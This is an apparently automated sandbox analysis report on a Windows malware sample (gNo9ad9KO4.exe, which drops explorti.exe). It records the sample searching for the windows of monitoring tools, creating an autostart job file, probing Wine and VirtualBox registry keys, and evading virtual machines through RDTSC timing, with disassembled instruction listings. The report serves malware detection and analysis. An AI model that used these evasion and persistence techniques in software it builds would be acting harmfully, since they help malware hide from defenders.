Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

File created: C:\Windows\Tasks\explorti.job

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe

Process information set: NOOPENFILEERRORBOX

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 1CF6C0 second address: 1CEE86 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 clc 0x0000000a push dword ptr [ebp+122D02D1h] 0x00000010 jmp 00007F4688C929DEh 0x00000015 call dword ptr [ebp+122D34DBh] 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D1AD8h], ecx 0x00000022 xor eax, eax 0x00000024 cld 0x00000025 mov edx, dword ptr [esp+28h] 0x00000029 jmp 00007F4688C929E9h 0x0000002e mov dword ptr [ebp+122D3B28h], eax 0x00000034 add dword ptr [ebp+122D1AD8h], ebx 0x0000003a mov esi, 0000003Ch 0x0000003f mov dword ptr [ebp+122D1AD8h], esi 0x00000045 mov dword ptr [ebp+122D1AD8h], esi 0x0000004b add esi, dword ptr [esp+24h] 0x0000004f clc 0x00000050 lodsw 0x00000052 clc 0x00000053 add eax, dword ptr [esp+24h] 0x00000057 or dword ptr [ebp+122D1AD8h], ebx 0x0000005d mov ebx, dword ptr [esp+24h] 0x00000061 jmp 00007F4688C929DCh 0x00000066 nop 0x00000067 pushad 0x00000068 push edx 0x00000069 jmp 00007F4688C929DAh 0x0000006e pop edx 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F4688C929E8h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33D244 second address: 33D25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B774h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33D25C second address: 33D285 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4688C929D6h 0x00000008 jnc 00007F4688C929D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4688C929E5h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33D285 second address: 33D29F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4688C1B766h 0x00000008 jmp 00007F4688C1B770h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33D29F second address: 33D2B6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4688C929DAh 0x00000008 pushad 0x00000009 ja 00007F4688C929D6h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33C07C second address: 33C099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4688C1B766h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F4688C1B76Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33C099 second address: 33C09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 33C74D second address: 33C753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 34013F second address: 340144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 340144 second address: 34015E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C1B776h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 34015E second address: 340185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4688C929DDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 340185 second address: 34018B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 34018B second address: 34018F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 34018F second address: 3401E0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007F4688C1B771h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007F4688C1B76Ch 0x00000018 pop eax 0x00000019 mov dword ptr [ebp+122D33C2h], eax 0x0000001f stc 0x00000020 push 00000003h 0x00000022 mov dword ptr [ebp+122D17A2h], edx 0x00000028 push 00000000h 0x0000002a mov dh, 0Bh 0x0000002c push 00000003h 0x0000002e mov dword ptr [ebp+122D17A2h], ecx 0x00000034 push 9465B82Bh 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3401E0 second address: 3401EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4688C929D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3403A2 second address: 3403AC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3403AC second address: 3403B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3403B1 second address: 3403B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3403B7 second address: 3403F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F4688C929D8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D3C04h] 0x0000002a push 00000000h 0x0000002c mov dh, 62h 0x0000002e push D0F05AC1h 0x00000033 push ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3403F9 second address: 340480 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a add dword ptr [esp], 2F0FA5BFh 0x00000011 sub si, 5E7Ah 0x00000016 push 00000003h 0x00000018 add dword ptr [ebp+122D36A9h], edx 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 push ecx 0x00000022 mov dx, di 0x00000025 pop ecx 0x00000026 pop edi 0x00000027 push 00000003h 0x00000029 push 59A1D9F2h 0x0000002e jmp 00007F4688C1B770h 0x00000033 add dword ptr [esp], 665E260Eh 0x0000003a mov edx, dword ptr [ebp+122D3AB8h] 0x00000040 lea ebx, dword ptr [ebp+1244502Ch] 0x00000046 push esi 0x00000047 jmp 00007F4688C1B772h 0x0000004c pop ecx 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 js 00007F4688C1B777h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 361403 second address: 361409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 361409 second address: 36140F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36140F second address: 361424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push esi 0x0000000d jne 00007F4688C929D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32A50D second address: 32A52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F4688C1B76Ch 0x0000000e jnc 00007F4688C1B766h 0x00000014 jg 00007F4688C1B76Ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32A52D second address: 32A543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35F3FA second address: 35F3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35F3FE second address: 35F40A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F4688C929D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35F56D second address: 35F57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35F6D7 second address: 35F6DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35F6DF second address: 35F6E9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35FB1A second address: 35FB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35FB1E second address: 35FB22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35FB22 second address: 35FB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3602E5 second address: 3602EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3602EC second address: 3602F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 35737C second address: 3573B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C1B76Ah 0x00000007 push esi 0x00000008 jmp 00007F4688C1B776h 0x0000000d jo 00007F4688C1B766h 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push edi 0x00000018 jnp 00007F4688C1B766h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3605C1 second address: 3605C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3605C7 second address: 3605CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3605CB second address: 3605CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3605CF second address: 3605F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4688C1B779h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3605F2 second address: 3605F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3605F6 second address: 360616 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jp 00007F4688C1B766h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4688C1B772h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 360D8E second address: 360D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 360D92 second address: 360DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F4688C1B766h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32A529 second address: 32A52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36101E second address: 361028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 361028 second address: 361030 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 361030 second address: 361038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 361038 second address: 36103C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3612BA second address: 3612C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3612C0 second address: 3612C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36384F second address: 363855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 363855 second address: 363898 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jo 00007F4688C929E4h 0x00000012 pushad 0x00000013 jnl 00007F4688C929D6h 0x00000019 jo 00007F4688C929D6h 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 jmp 00007F4688C929E4h 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e jl 00007F4688C929D6h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36215D second address: 362161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3628A6 second address: 3628AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 364CDD second address: 364CE3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 364CE3 second address: 364CE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 364CE8 second address: 364CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 364CF1 second address: 364CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 364CF7 second address: 364CFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36BFFC second address: 36C000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36C000 second address: 36C004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36C746 second address: 36C769 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4688C929E9h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36C8CA second address: 36C8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F4688C1B778h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36C8DA second address: 36C8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DCh 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36C8EE second address: 36C8F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36C8F4 second address: 36C916 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 jnl 00007F4688C929D6h 0x0000000f pop edi 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 jbe 00007F4688C929D6h 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36DCD4 second address: 36DCD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36DCD8 second address: 36DCE5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36DF63 second address: 36DF67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36DF67 second address: 36DF6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36E068 second address: 36E086 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4688C1B771h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36E5C7 second address: 36E5D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36E80C second address: 36E829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4688C1B766h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4688C1B76Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36E9F9 second address: 36E9FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36F05E second address: 36F068 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36F987 second address: 36F9A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4688C929E0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 36F9A2 second address: 36F9A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
